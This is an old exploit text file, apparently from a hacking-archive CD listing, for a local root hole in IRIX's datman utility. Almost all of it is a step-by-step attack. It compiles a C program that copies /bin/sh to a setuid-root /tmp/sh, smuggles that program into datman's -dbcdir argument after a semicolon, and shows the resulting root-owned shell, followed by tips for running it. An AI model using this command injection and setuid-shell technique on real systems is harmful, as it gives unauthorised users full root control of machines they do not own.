home *** CD-ROM | disk | FTP | other *** search
/ Power Hacker 2003 / Power_Hacker_2003.iso / Exploit and vulnerability / hoobie / irix-dataman.txt < prev    next >
Encoding:
Text File  |  2001-11-06  |  737 b   |  26 lines
  1. Irix: datman hole, errata
  2.  
  3. % cat > /tmp/makesh.c
  4. main()
  5. {
  6.   seteuid(0); setegid(0);
  7.   system("cp /bin/sh /tmp;chmod a=rsx /tmp/sh");
  8. }
  9. % cc /tmp/makesh.c -o /tmp/makesh
  10. % mv .cddb .cddb.old
  11. % touch .cdplayerrc
  12. % /usr/sbin/datman -dbcdir "/tmp/blah;/tmp/makesh"
  13.   Created "/tmp/blah"
  14. Converting /home/medc2/yuri/.cdplayerrc into /tmp/blah
  15.  
  16. % ls -l /tmp/sh
  17. -r-sr-sr-x    1 root     sys       140784 Dec  9 15:24 /tmp/sh*
  18.  
  19. In above example, few dialog windows will pop up after starting datman.
  20. Just press enter in each of them.  Make sure your DISPLAY is set correctly.
  21.  
  22. Note though you can pass arbitrary shell commands to sh in -dbcdir, these
  23. commands will be executed with euid set to your uid, so seteuid(0) needs to
  24. be called first.
  25.  
  26.